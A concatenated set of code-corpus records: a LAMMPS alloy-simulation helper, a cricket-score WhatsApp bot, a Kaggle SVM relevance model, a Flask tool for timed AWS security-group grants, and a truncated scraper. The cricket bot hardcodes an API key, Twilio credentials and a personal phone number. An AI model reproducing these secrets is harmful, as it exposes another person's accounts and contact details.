\"\"\"\n## volOrPress = self.getVolOrPress[0]\n## cwd = os.getcwd()\n## for time in self.runTimes:\n## for size in self.systemSizes:\n## for temp in self.temperatures:\n## for var in volOrPress:\n## for concPercent in self.concPercents:\n## wd = self.getWorkDir(time,size,temp,var,concPercent)\n## os.chdir(wd)\n## sh(\"awk -f \" + self.awkLib() + \"/awkReadLog log.run > log.data\") #Removes everything except for header and data from simulation log files\n## try:\n## sh(\"awk -f \" + self.awkLib() + \"/awkReadLog log.loop > log.temp\") #Removes everything except for header and data from simulation log files\n## sh(\"awk -f \" + self.awkLib() + \"/awkCombineLog log.temp > log.loop\") # Removes the extra headers loop files\n## except:\n## pass\n## sh(\"awk -f \" + self.awkLib() + \"/awkFixElementId dump.xyz > dump.pos\") # Changes the names of the atoms in the dump files to Cu and Ni\n## os.chdir(cwd)\n## return \n## \n\n
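 # Editor's sketch (illustrative only, nothing below calls it): the five nested parameter loops repeated throughout this class can be flattened with itertools.product, which keeps the sweep definition in one place, e.g.\n #\n # from itertools import product\n # for time, size, temp, var, concPercent in product(self.runTimes, self.systemSizes, self.temperatures, volOrPress, self.concPercents):\n # ...\n\n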
def recordData(self,thermoDataFile = \"thermoData\"):\n \"\"\"\n Record the averages, standard deviations, and standard deviations of the mean for the energy, temperature, pressure, and volume of each simulation\n in the current directory in a file specified in the input. Default is thermoDataFile = \\\"thermoData\\\"\n \"\"\"\n w = open(thermoDataFile,mode = \"w\")\n writer = csv.writer(w,delimiter = \" \")\n volOrPress = self.getVolOrPress()[0]\n header = \"\"\n cwd = os.getcwd()\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n os.chdir(wd)\n try:\n if not header:\n data,header = utils.getThermoStats1(self.logFile) # automatically uses log.data as this is the data file after cleanOutput is run\n #data,header = utils.getFinalStats(self.logFile)\n writer.writerow(header)\n writer.writerow(data)\n else:\n data = utils.getThermoStats1(self.logFile)[0]\n #data = utils.getFinalStats(self.logFile)[0]\n writer.writerow(data)\n except:\n pass\n os.chdir(cwd)\n w.close()\n return \n \n \n def getData(self):\n \"\"\"\n Makes a pandas dataframe of the averages, standard deviations, and standard deviations of the mean for the\n energy, temperature, pressure, and volume of each simulation.\n \"\"\"\n volOrPress = self.getVolOrPress()[0]\n df = []\n header = \"\"\n cwd = os.getcwd()\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n print(\"Changing to directory %s\" %(wd))\n os.chdir(wd)\n try:\n if not header:\n data,header = utils.getThermoStats1(self.logFile) # Used for reading variables defined in initConv.mod\n print(\"The header of the data is:\")\n print(header)\n #data,header = utils.getFinalStats(self.logFile) # Use this when out is whole sim time average\n df.append(data)\n print(\"Line of Data\")\n print(data)\n else:\n data = utils.getThermoStats1(self.logFile)[0]\n #data = utils.getFinalStats(self.logFile)[0]\n df.append(data)\n print(\"Line of Data\")\n print(data)\n except:\n pass\n os.chdir(cwd)\n print(\"Changing to directory %s\" %(cwd)) \n return pd.DataFrame(df,columns = header)\n\n 
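 # Editor's sketch of the forward-difference rule that utils.dForwDif is assumed to implement; the quadrature error model is an assumption as well, and nothing in this class calls this demo.\n @staticmethod\n def demoForwDif(X, dX, Y, dY):\n \"\"\"Forward differences with endpoint uncertainties propagated in quadrature.\"\"\"\n dYdX = []\n ddYdX = []\n midX = []\n for i in range(len(X) - 1):\n run = X[i+1] - X[i]\n rise = Y[i+1] - Y[i]\n slope = rise/run\n # assumes monotonic X and nonzero rise so the relative errors are defined\n err = abs(slope)*np.sqrt((dY[i]**2 + dY[i+1]**2)/rise**2 + (dX[i]**2 + dX[i+1]**2)/run**2)\n dYdX.append(slope)\n ddYdX.append(err)\n midX.append((X[i] + X[i+1])/2)\n return dYdX,ddYdX,midX\n\n 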
def getForwDif(self,xString,yString):\n \"\"\"\n This function computes the derivative of thermo variable B with respect to A\n using the forward difference method. A and B should be strings, any of Volume, Energy, Press, or Temp.\n The outputs are generated using utils.getThermoStats and utils.dForwDif and are:\n X - list of averages of independent variable in sims\n dX - the uncertainties in X\n Y - list of averages of dependent variable in sims\n dY - the uncertainties in Y\n dYdX - the derivative approximated by forward difference\n ddYdX - the uncertainty in dYdX\n midX - the midpoint between the values in the X variable\n \"\"\"\n thermoDF = self.getData()\n xSAve = xString+\" ave\"\n xSSTD = xString+\" std\"\n ySAve = yString+\" ave\"\n ySSTD = yString+\" std\"\n thermoDF = thermoDF.sort_values(xSAve)\n X = list(thermoDF[xSAve])\n dX = list(thermoDF[xSSTD]) \n Y = list(thermoDF[ySAve])\n dY = list(thermoDF[ySSTD])\n dYdX,ddYdX,midX = utils.dForwDif(X,dX,Y,dY)\n return X,dX,Y,dY,dYdX,ddYdX,midX\n\n def calcBulkModT(self):\n \"\"\"\n This code takes the data generated by utils.getThermoStats and computes the bulk modulus from it.\n \"\"\"\n V,dV,P,dP,dPdV,ddPdV,midV = self.getForwDif(\"Volume\",\"Press\")\n N = len(midV)\n bM = np.zeros(N) #Initializing Bulk Modulus\n dbM = np.zeros(N)# Uncertainty in bM\n dmidV = np.zeros(N) # Uncertainty in midV\n bM = [-V[i]*dPdV[i] for i in range(len(dPdV))]\n dbM = [abs(bM[i])*np.sqrt((ddPdV[i]/dPdV[i])**2 + (dV[i]/V[i])**2) for i in range(len(bM))]\n return bM,dbM,V[:-1],dV[:-1]\n\n def calcThermExp(self):\n \"\"\"\n This code takes the data generated by utils.getThermoStats and computes the thermal expansion coeff from it.\n \"\"\"\n T,dT,V,dV,dVdT,ddVdT,midT = self.getForwDif(\"Temp\",\"Volume\")\n N = len(midT)\n tE = [dVdT[i]/V[i] for i in range(len(dVdT))]\n dtE = [abs(tE[i])*np.sqrt((ddVdT[i]/dVdT[i])**2 + (dV[i]/V[i])**2) for i in range(len(tE))]\n return tE,dtE,T[:-1],dT[:-1]\n\n def calcHeatCapV(self):\n \"\"\"\n This code takes the data generated by utils.getThermoStats and computes the heat capacity at constant volume.\n \"\"\"\n T,dT,E,dE,dEdT,ddEdT,midT = self.getForwDif(\"Temp\",\"TotEng\")\n dmidT = np.array([(1/2)*np.sqrt(dT[i+1]**2 + dT[i]**2) for i in range(len(dT) - 1)])\n return dEdT,ddEdT,T[:-1],dT[:-1]\n \n def calcHeatCapP(self):\n \"\"\"\n This code takes the data generated by utils.getThermoStats and computes the heat capacity at constant pressure.\n \"\"\"\n T,dT,H,dH,dHdT,ddHdT,midT = self.getForwDif(\"Temp\",\"Enthalpy\")\n dmidT = np.array([(1/2)*np.sqrt(dT[i+1]**2 + dT[i]**2) for i in range(len(dT) - 1)])\n return dHdT,ddHdT,T[:-1],dT[:-1]\n\n\n def simQPlot(self,logFile = \"log.data\"):\n \"\"\"\n This function is meant for plotting lammps outputs from the log file over the range of simulations.\n \"\"\"\n volOrPress = self.getVolOrPress()[0]\n cwd = os.getcwd()\n for time in self.runTimes:\n for size in self.systemSizes:\n for temp in self.temperatures:\n for var in volOrPress:\n for concPercent in self.concPercents:\n wd = self.getWorkDir(time,size,temp,var,concPercent)\n os.chdir(wd)\n print(\"Time: %d, N: %d, T: %0.2f, %s: %0.4f, C: %d\" %(time,size,temp,\"P\" if self.simType == \"npt\" else \"V\",var,concPercent*10))\n utils.qplot(logFile) # A function from utils which gives a quick plot of the log data\n os.chdir(cwd)\n return \n\n\nclass diffusion(simulation):\n\t\"\"\"\n\tThis class is designed to run simulations to compute a diffusion coefficient\n\tfor a material at a range of concentrations, temperatures, and pressures in \n\tan NPT ensemble.\n\t\"\"\"\n\tdef __init__(self,lib = \"$HOME/RIPS/lib/\",lammps = \"lmp_daily -in\",runTimes = [100,],alloy = \"CuNi\",latticeConst = 
3.6,latticeType = \"FCC\",numAtomTypes = 2,systemSizes = [6,],temperatures = [300,],pressures = [0,],lengths = [6*3.63,],concPercents = [30,],timeStep = 0.0001,simType = \"npt\",fileName = \"CuNi\",potentialFile = \"CuNi.eam.alloy\",inTemplate = \"in.Template\",copyDir = \"./In\",logFile = \"log.run\"):\n\t\tself.lib = lib \n\t\tself.lammps = lammps\n\t\tself.runTimes = runTimes\n\t\tself.alloy = alloy\n\t\tself.latticeConst = latticeConst\n\t\tself.latticeType = latticeType\n\t\tself.numAtomTypes = numAtomTypes\n\t\tself.systemSizes = systemSizes\n\t\tself.temperatures = temperatures\n\t\tself.pressures = pressures\n\t\tself.lengths = lengths\n\t\tself.concPercents = concPercents\n\t\tself.timeStep = timeStep\n\t\tself.simType = simType\n\t\tself.fileName = fileName\n\t\tself.potentialFile = potentialFile\n\t\tself.inTemplate = inTemplate\n\t\tself.copyDir = copyDir\n\t\tself.logFile = logFile\n\t\treturn \n\n\tdef getWorkDir(self,time,size,temp,press,conc):\n\t\trunTime = str(int(time/self.timeStep))\n\t\treturn \"Out/RunTime\" + runTime + \"Size\" + str(int(size)) + \"Temp\" + str(int(temp)) + \"Conc\" + str(int(conc)) + \"Press\" + str(int(press))\n\n\tdef runDiffSims(self):\n\t\tcwd = os.getcwd()\n\t\tsh(\"mkdir Out\")\n\t\tfor time in self.runTimes:\n\t\t\tfor size in self.systemSizes:\n\t\t\t\tfor temp in self.temperatures:\n\t\t\t\t\tfor press in self.pressures:\n\t\t\t\t\t\tfor conc in self.concPercents:\n\t\t\t\t\t\t\twd = self.getWorkDir(time,size,temp,press,conc)\n\t\t\t\t\t\t\tsh(\"mkdir \"+ wd)\n\t\t\t\t\t\t\tself.cpTemplate(wd)\n\t\t\t\t\t\t\tos.chdir(wd)\n\t\t\t\t\t\t\tinFile = inF.inFile(fileName = self.fileName,readFile = self.inTemplate,runTime=time,timeStep = self.timeStep)\n\t\t\t\t\t\t\tinFile.writeInFile(options = [\"TEMPERATURE equal \" + str(temp), \"PRESSURE equal \" + str(press),\"RANDOM equal \" + str(randint(10000,9999999))])\n\t\t\t\t\t\t\tdataFile = dataF.AtomDataFileGenerator(filename = self.fileName,latticeType = self.latticeType,alloy = self.alloy,customLatticeConst = self.latticeConst,systemSize = size, atomTypes =self.numAtomTypes,alloyCompPercent = conc)\n\t\t\t\t\t\t\tdataFile.createDataFile()\n\t\t\t\t\t\t\tself.runLammps()\n\t\t\t\t\t\t\tos.chdir(cwd)\n\t\treturn \n\n\tdef getDiffCoeffs(self,saveFile = None):\n\t\theader = [\"Simulation Time\",\"System Size\",\"Temperature (K)\",\"Pressure (bar)\",\"Concentration\",\"Diffusion Coeff (cm\" + u\"\\u00B2\" + \"s\" + u\"\\u207B\\u00B9\" + \")\",\"Standard Error of Diff Coeff.\",\"r value of linear fit\"]\n\t\tdata = []\n\t\tcwd = os.getcwd()\n\t\tfor time in self.runTimes:\n\t\t\tfor size in self.systemSizes:\n\t\t\t\tfor temp in self.temperatures:\n\t\t\t\t\tfor press in self.pressures:\n\t\t\t\t\t\tfor conc in self.concPercents:\n\t\t\t\t\t\t\twd = self.getWorkDir(time,size,temp,press,conc)\n\t\t\t\t\t\t\tos.chdir(wd)\n\t\t\t\t\t\t\tdf = utils.readLog(self.logFile)\n\t\t\t\t\t\t\tt = [x*self.timeStep for x in df[\"Step\"]]\n\t\t\t\t\t\t\tmsd = list(df[\"c_MSD[4]\"])\n\t\t\t\t\t\t\tN = len(msd)\n\t\t\t\t\t\t\tm,b,r,p,dm = linregress(t[N//10:],msd[N//10:]) # I choose to ignore the first 10% of the data\n\t\t\t\t\t\t\tdata.append([time,size,temp,press,conc,m/60,dm/60,r])\n\t\t\t\t\t\t\tos.chdir(cwd)\n\t\tif not saveFile == None:\n\t\t\tf = open(saveFile,mode = \"w\")\n\t\t\tw = csv.writer(f)\n\t\t\tw.writerow(header)\n\t\t\tfor row in data:\n\t\t\t\tw.writerow(row)\n\t\t\tf.close()\n\t\treturn pd.DataFrame(data,columns = 
header)\n\t\t\n","sub_path":"lib/PyScripts/sims.py","file_name":"sims.py","file_ext":"py","file_size_in_byte":29902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96620386","text":"import requests\r\nfrom datetime import datetime\r\nclass scoreget:\r\n def __init__(self):\r\n self.url_get_all_matches=\"http://cricapi.com/api/matches\"\r\n self.url_get_scores=\"http://cricapi.com/api/cricketScore\"\r\n self.apikey=\"o92d54OkgEWBaIWDxpXBfMCYaKJ2\"\r\n self.unique_id=\"\"\r\n def get_unique_id(self):\r\n uri_params={\"apikey\":self.apikey}\r\n resp=requests.get(self.url_get_all_matches,params=uri_params)\r\n resp_dict=resp.json()\r\n uid_found=0;\r\n \r\n for i in resp_dict['matches']:\r\n if(i['team-1']==\"Delhi\" or i['team-2']==\"india\" and i['matchStarted']):\r\n todays_date=datetime.today().strftime('%Y-%m-%d')\r\n if todays_date==i['date'].split(\"T\")[0]:\r\n self.unique_id=i['unique_id'];\r\n uid_found=1\r\n break\r\n if not uid_found:\r\n self.unique_id=-1;\r\n send_data=self.current_score(self.unique_id);\r\n return send_data;\r\n \r\n def current_score(self,unique_id):\r\n data=\"\"\r\n if unique_id==-1:\r\n data=\"NO india matches today\"\r\n else:\r\n uri_params={\"apikey\":self.apikey,\"unique_id\":unique_id}\r\n resp=requests.get(self.url_get_scores,params=uri_params)\r\n resp_dict=resp.json()\r\n try:\r\n data=\"Here the score is:\\n\"+resp_dict['stat']+\"\\n\"+resp_dict['score']\r\n except KeyError as e:\r\n print(e)\r\n return data\r\n\r\n\r\nif __name__==\"__main__\":\r\n ob_score=scoreget()\r\n whatsapp_msg=ob_score.get_unique_id();\r\n print(whatsapp_msg)\r\n from twilio.rest import Client\r\n a_sid=\"ACf684ba82c43de1865fbd151977fce4a8\"\r\n auth_token=\"123bdeb15ed8079804aa458c5826d959\"\r\n client=Client(a_sid,auth_token)\r\n print(\"executed\");\r\n message=client.messages.create(body=whatsapp_msg, from_='whatsapp:+14155238886',to='whatsapp:+919640751504')\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n","sub_path":"cric bot.py","file_name":"cric bot.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14971632","text":"\"\"\"\nBased on Beating the Benchmark by Abhishek\n\n\"\"\"\n\nimport pandas as pd\nfrom nltk import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn import decomposition, metrics, grid_search\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.cross_validation import StratifiedKFold\nimport numpy as np\n\n#====================================================================\n\n\n# From: http://scikit-learn.org/stable/auto_examples/hetero_feature_union.html\nclass ItemSelector(BaseEstimator, TransformerMixin):\n \"\"\"For data grouped by feature, select subset of data at a provided key.\n\n The data is expected to be stored in a 2D data structure, where the first\n index is over features and the second is over samples. 
i.e.\n\n >> len(data[key]) == n_samples\n\n Please note that this is the opposite convention to sklearn feature\n matrixes (where the first index corresponds to sample).\n\n ItemSelector only requires that the collection implement getitem\n (data[key]). Examples include: a dict of lists, 2D numpy array, Pandas\n DataFrame, numpy record array, etc.\n\n >> data = {'a': [1, 5, 2, 5, 2, 8],\n 'b': [9, 4, 1, 4, 1, 3]}\n >> ds = ItemSelector(key='a')\n >> data['a'] == ds.transform(data)\n\n ItemSelector is not designed to handle data grouped by sample. (e.g. a\n list of dicts). If your data is structured this way, consider a\n transformer along the lines of\n `sklearn.feature_extraction.DictVectorizer`.\n\n Parameters\n ----------\n key : hashable, required\n The key corresponding to the desired value in a mappable.\n \"\"\"\n def __init__(self, key):\n self.key = key\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, data_dict):\n return data_dict[self.key]\n\nclass LemmaTokenizer(object):\n def __init__(self):\n self.wnl = WordNetLemmatizer()\n self.stm = PorterStemmer()\n def __call__(self, doc):\n # Stem each word in the given document and return this\n # as a list of words.\n return [self.wnl.lemmatize(t) for t in word_tokenize(doc)]\n\n\nclass IdentityTransform(BaseEstimator, TransformerMixin):\n \"\"\"Extract features from each document for DictVectorizer\"\"\"\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, values):\n # Needs to be a numpy array for later operations like scaling\n return np.array([[v] for v in values], dtype=float)\n\n\n# The following 3 functions have been taken from Ben Hamner's github repository\n# https://github.com/benhamner/Metrics\ndef confusion_matrix(rater_a, rater_b, min_rating=None, max_rating=None):\n \"\"\"\n Returns the confusion matrix between rater's ratings\n \"\"\"\n assert(len(rater_a) == len(rater_b))\n if min_rating is None:\n min_rating = min(rater_a + rater_b)\n if max_rating is None:\n max_rating = max(rater_a + rater_b)\n num_ratings = int(max_rating - min_rating + 1)\n conf_mat = [[0 for i in range(num_ratings)]\n for j in range(num_ratings)]\n for a, b in zip(rater_a, rater_b):\n conf_mat[a - min_rating][b - min_rating] += 1\n return conf_mat\n\n\ndef histogram(ratings, min_rating=None, max_rating=None):\n \"\"\"\n Returns the counts of each type of rating that a rater made\n \"\"\"\n if min_rating is None:\n min_rating = min(ratings)\n if max_rating is None:\n max_rating = max(ratings)\n num_ratings = int(max_rating - min_rating + 1)\n hist_ratings = [0 for x in range(num_ratings)]\n for r in ratings:\n hist_ratings[r - min_rating] += 1\n return hist_ratings\n\n\ndef quadratic_weighted_kappa(y, y_pred):\n \"\"\"\n Calculates the quadratic weighted kappa\n\n quadratic_weighted_kappa calculates the quadratic weighted kappa value,\n which is a measure of inter-rater agreement between two raters that\n provide discrete numeric ratings. Potential values range from -1\n (representing complete disagreement) to 1 (representing complete\n agreement). A kappa value of 0 is expected if all agreement is due to\n chance.\n\n quadratic_weighted_kappa(rater_a, rater_b), where rater_a and rater_b each\n correspond to a list of integer ratings. These lists must have the same\n length.\n\n The ratings should be integers, and it is assumed that they contain the\n complete range of possible ratings. 
quadratic_weighted_kappa(X,\n min_rating, max_rating), where min_rating is the minimum possible rating,\n and max_rating is the maximum possible rating.\n \"\"\"\n\n rater_a = y\n rater_b = y_pred\n min_rating=None\n max_rating=None\n rater_a = np.array(rater_a, dtype=int)\n rater_b = np.array(rater_b, dtype=int)\n assert(len(rater_a) == len(rater_b))\n if min_rating is None:\n min_rating = min(min(rater_a), min(rater_b))\n if max_rating is None:\n max_rating = max(max(rater_a), max(rater_b))\n conf_mat = confusion_matrix(rater_a, rater_b,\n min_rating, max_rating)\n num_ratings = len(conf_mat)\n num_scored_items = float(len(rater_a))\n\n hist_rater_a = histogram(rater_a, min_rating, max_rating)\n hist_rater_b = histogram(rater_b, min_rating, max_rating)\n\n numerator = 0.0\n denominator = 0.0\n\n for i in range(num_ratings):\n for j in range(num_ratings):\n expected_count = (hist_rater_a[i] * hist_rater_b[j]\n / num_scored_items)\n d = pow(i - j, 2.0) / pow(num_ratings - 1, 2.0)\n numerator += d * conf_mat[i][j] / num_scored_items\n denominator += d * expected_count / num_scored_items\n\n return (1.0 - numerator / denominator)\n\ndef combine_factors(x):\n s = \"{} {}\".format(x['query'], x['product_title'])\n return s\n\n\ndef build_pipe_line():\n countvect_char = TfidfVectorizer(\n tokenizer = LemmaTokenizer(),\n analyzer=\"char_wb\", \n binary=False, \n norm = None,\n stop_words = 'english')\n svd = TruncatedSVD()\n scl = StandardScaler()\n clf = SVC()\n\n p = Pipeline([\n # Use FeatureUnion to combine the features \n # query and title, and rating range\n ('features', FeatureUnion(\n transformer_list=[\n ('cvt', Pipeline([\n ('selector', ItemSelector(key='doc')),\n ('vect', countvect_char),\n ('svd', svd),\n ('scl', scl)\n ])),\n ('minr', Pipeline([\n ('selector', ItemSelector(key='minr')),\n ('transf', IdentityTransform()),\n ('scl', scl)\n ])),\n ('maxr', Pipeline([\n ('selector', ItemSelector(key='maxr')),\n ('transf', IdentityTransform()),\n ('scl', scl)\n ])),\n ],\n # weight components in FeatureUnion (keys must match the transformer names above)\n transformer_weights={\n 'cvt': 1.0,\n 'minr': 0.5,\n 'maxr': 0.5\n },\n )),\n # Use a SVC classifier on the combined features\n ('clf', clf),\n ])\n return p\n\n\nif __name__ == '__main__':\n train = pd.read_csv('../../Raw/train.csv')\n test = pd.read_csv('../../Raw/test.csv')\n train_mmr = pd.read_csv('../../Processed/train_minmaxr.csv')\n test_mmr = pd.read_csv('../../Processed/test_minmaxr.csv')\n\n # Make a copy of the query ids so we\n # can build a submission later on.\n idx = test.id.values.astype(int)\n # we don't need ID columns anymore\n train = train.drop('id', axis=1)\n test = test.drop('id', axis=1)\n\n # create labels.\n y = train.median_relevance.values\n # Now we can drop them from the training set\n # and we can drop the related info too.\n train = train.drop(['median_relevance', \n 'relevance_variance'], axis=1)\n\n trainX = pd.DataFrame({'doc':list(train.apply(combine_factors,axis=1)),\n 'minr':train_mmr['minr'],\n 'maxr':train_mmr['maxr']\n })\n testX = pd.DataFrame({'doc':list(test.apply(combine_factors, axis=1)),\n 'minr':test_mmr['minr'],\n 'maxr':test_mmr['maxr']\n })\n clf = build_pipe_line()\n\n print(\"pipeline:\", [name for name, _ in clf.steps])\n\n if True:\n # Create a parameter grid to search for \n # best parameters for everything in the pipeline\n if False:\n param_grid = {\n 'features__cvt__vect__ngram_range' : [(2,7), (1, 6), (2,6), (3,6), (2,5) ],\n 'features__cvt__vect__min_df' : list(range(3, 12, 1)), #[6]\n 'features__cvt__svd__n_components' : list(range(100, 350, 5)), #220\n 
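# The trailing comments (#[6], #220, #4) record values favored by earlier, wider searches; this inactive branch keeps the full grid for reference while the active branch below pins single values.\n 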
'clf__degree' : list(range(1, 10, 1)), #4\n 'clf__C' : list(range(5, 10, 1)),\n }\n else:\n param_grid = {\n 'features__cvt__vect__ngram_range' : [(1, 6)],\n 'features__cvt__vect__min_df' : [3],\n 'features__cvt__svd__n_components' : [240],\n 'clf__degree' : [5],\n 'clf__C' : [9]\n }\n\n # Kappa Scorer \n kappa_scorer = metrics.make_scorer(\n quadratic_weighted_kappa, greater_is_better = True)\n\n # Cross validation\n cv = StratifiedKFold(y, n_folds=3, shuffle=True, random_state=42)\n\n # Initialize Grid Search Model\n # Try many different parameters to find the best fitting model\n model = grid_search.RandomizedSearchCV(\n n_iter=1, # number of setting to try\n estimator=clf, # Pipeline\n param_distributions=param_grid,\n scoring=kappa_scorer,\n verbose=10,\n n_jobs=1, # Number of jobs to run in parallel\n cv=cv,\n iid=True,\n refit=True)\n\n # Fit Grid Search Model\n print(\"Fitting training data .\")\n model.fit(trainX, y)\n\n print(\"Best score: %0.3f\" % model.best_score_)\n print(\"Best parameters set:\")\n best_parameters = model.best_estimator_.get_params()\n for param_name in sorted(param_grid.keys()):\n print(\"\\t%s: %r\" % (param_name, best_parameters[param_name]))\n\n # Get best model\n best_model = model.best_estimator_\n # Fit model with best parameters optimized for \n # quadratic_weighted_kappa\n best_model.fit(trainX, y)\n preds = best_model.predict(testX)\n\n print(\"Creating submission\")\n # Create your first submission file\n submission = pd.DataFrame({\"id\": idx, \"prediction\": preds})\n submission.to_csv(\"Submission/sub.csv\", index=False)\n print(\"done\")\n\n\n","sub_path":"Models/BTBDocumented/sandbox3.py","file_name":"sandbox3.py","file_ext":"py","file_size_in_byte":11153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571670206","text":"import time\nimport logging\nimport os\n\nfrom functools import wraps\nfrom util import getorraise, _revoke, PyLogReqLogger, GRANT_KEY_FORMULA, fix_cidr\n\nimport redis\nimport boto.ec2\nfrom boto.utils import RequestHook\nfrom flask import Flask\nfrom flask import request, redirect, Response, render_template\n\napp = Flask(__name__)\n\nport = getorraise('PORT', 'HTTP listen port')\npassword = getorraise('PASSWORD', 'HTTP Password')\naws_access = getorraise('AWS_ACCESS_KEY', 'AWS access key')\naws_secret = getorraise('AWS_SECRET_KEY', 'AWS secret key')\nboto_region = getorraise('AWS_REGION', 'AWS region')\nredis_url = getorraise('REDIS_URL', 'Redis URL')\n\ndebug = os.getenv('DEBUG')\ndebug = debug is not None\n\ndef check_auth(given_username, given_password):\n \"\"\"This function is called to check if a username /\n password combination is valid.\n \"\"\"\n return given_username == 'root' and given_password == password\n\ndef authenticate():\n \"\"\"Sends a 401 response that enables basic auth\"\"\"\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.authorization\n if not auth or not check_auth(auth.username, auth.password):\n return authenticate()\n return f(*args, **kwargs)\n return decorated\n\ndef requires_ec2(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n ec2 = boto.ec2.connect_to_region(boto_region, aws_access_key_id=aws_access, aws_secret_access_key=aws_secret)\n ec2.set_request_hook(PyLogReqLogger())\n kwargs['ec2'] = ec2\n return 
f(*args, **kwargs)\n return decorated\n\ndef requires_rds(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n kwargs['rds'] = redis.from_url(redis_url)\n return f(*args, **kwargs)\n return decorated\n\n@app.route('/')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef index(ec2=None, rds=None):\n security_groups = ec2.get_all_security_groups()\n return render_template('index.html', security_groups=security_groups)\n\n@app.route('/edit/')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef edit(group_id, ec2=None, rds=None):\n security_groups = ec2.get_all_security_groups(group_ids=[group_id])\n\n if len(security_groups) == 0:\n return \"Missing security groups\"\n\n security_group = security_groups[0]\n\n for rule in security_group.rules:\n grants_with_cidrs = []\n\n for grant in rule.grants:\n if grant.cidr_ip:\n ttl = rds.get(GRANT_KEY_FORMULA.format(security_group_id=group_id, protocol=rule.ip_protocol, from_port=rule.from_port, to_port=rule.to_port, cidr=grant.cidr_ip))\n\n if ttl is None or ttl == 0:\n grant.time_left = ttl\n else:\n grant.time_left = int(float(ttl) - time.time())\n\n grants_with_cidrs.append(grant)\n\n rule.grants = grants_with_cidrs\n \n if 'X-Forwarded-For' in request.headers:\n ip = request.headers['X-Forwarded-For']\n else:\n ip = request.remote_addr\n\n return render_template('edit.html', ip=ip, security_group=security_group)\n\n@app.route('/grant', methods=[\"POST\"])\n@requires_auth\n@requires_ec2\n@requires_rds\ndef authorize(ec2=None, rds=None):\n security_group_id, protocol, cidr, from_port, to_port, duration = request.form['security_group_id'], request.form['protocol'], request.form['cidr'], int(request.form['from_port']), int(request.form['to_port']), int(request.form['duration'])\n\n cidr_fixed = fix_cidr(cidr)\n\n security_groups = ec2.get_all_security_groups(group_ids=[security_group_id])\n\n if len(security_groups) == 0:\n return \"Security group not found\"\n\n security_group = security_groups[0]\n\n if security_group.authorize(ip_protocol=protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_fixed):\n grant_key = GRANT_KEY_FORMULA.format(security_group_id=security_group_id, protocol=protocol, from_port=from_port, to_port=to_port, cidr=cidr_fixed)\n rds.set(grant_key, str(time.time() + duration))\n return redirect(\"/edit/\" + security_group_id)\n else:\n return \"An error occurred\"\n\n@app.route('/persist')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef persist(ec2=None, rds=None):\n security_group_id, protocol, cidr, from_port, to_port = request.args.get('security_group_id'), request.args.get('protocol'), request.args.get('cidr'), int(request.args.get('from_port')), int(request.args.get('to_port'))\n\n grant_key = GRANT_KEY_FORMULA.format(security_group_id=security_group_id, protocol=protocol, from_port=from_port, to_port=to_port, cidr=cidr)\n rds.delete(grant_key)\n return redirect(\"/edit/\" + security_group_id)\n\n@app.route('/revoke')\n@requires_auth\n@requires_ec2\n@requires_rds\ndef revoke(ec2=None, rds=None):\n security_group_id, protocol, cidr, from_port, to_port = request.args.get('security_group_id'), request.args.get('protocol'), request.args.get('cidr'), request.args.get('from_port'), request.args.get('to_port')\n\n security_groups = ec2.get_all_security_groups(group_ids=[security_group_id])\n\n if len(security_groups) == 0:\n return \"Security group not found\"\n\n security_group = security_groups[0]\n\n if _revoke(rds, security_group, protocol, from_port, to_port, cidr):\n return redirect(\"/edit/\" + security_group_id)\n 
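check_auth above compares the username and password with ==, which leaks timing information about how many leading characters matched. A constant-time comparison is a drop-in hardening; a sketch, not part of the original app:

import hmac

def check_auth(given_username, given_password):
    # hmac.compare_digest takes time independent of where the inputs
    # first differ; encode to bytes so non-ASCII passwords also work.
    return (hmac.compare_digest(given_username.encode(), b'root')
            and hmac.compare_digest(given_password.encode(), password.encode()))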
else:\n return \"An error occurred\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=debug, host='0.0.0.0', port=int(os.getenv(\"PORT\")))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649871943","text":"import json,requests\nfrom bs4 import BeautifulSoup\n\n# str = '[{\"username\":\"dachong\", \"age\":\"18\"}]'\n# print(type(str))\n# json_str = json.dumps(str, ensure_ascii=False)\n# print(json_str, type(json_str))\n#\n# new_str = json.loads(str)\n# print(new_str,type(new_str))\n#\n# with open(\"temp.json\",\"w\") as f:\n# json.dump(json.loads(str),fp=f,indent=4)\n# # sss=[]\n# # with open(\"temp.json\",\"r\") as f:\n# # sss=json.load(f)\n# # print(sss)\n# https://blog.csdn.net/anthony_1223/article/details/82259286\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 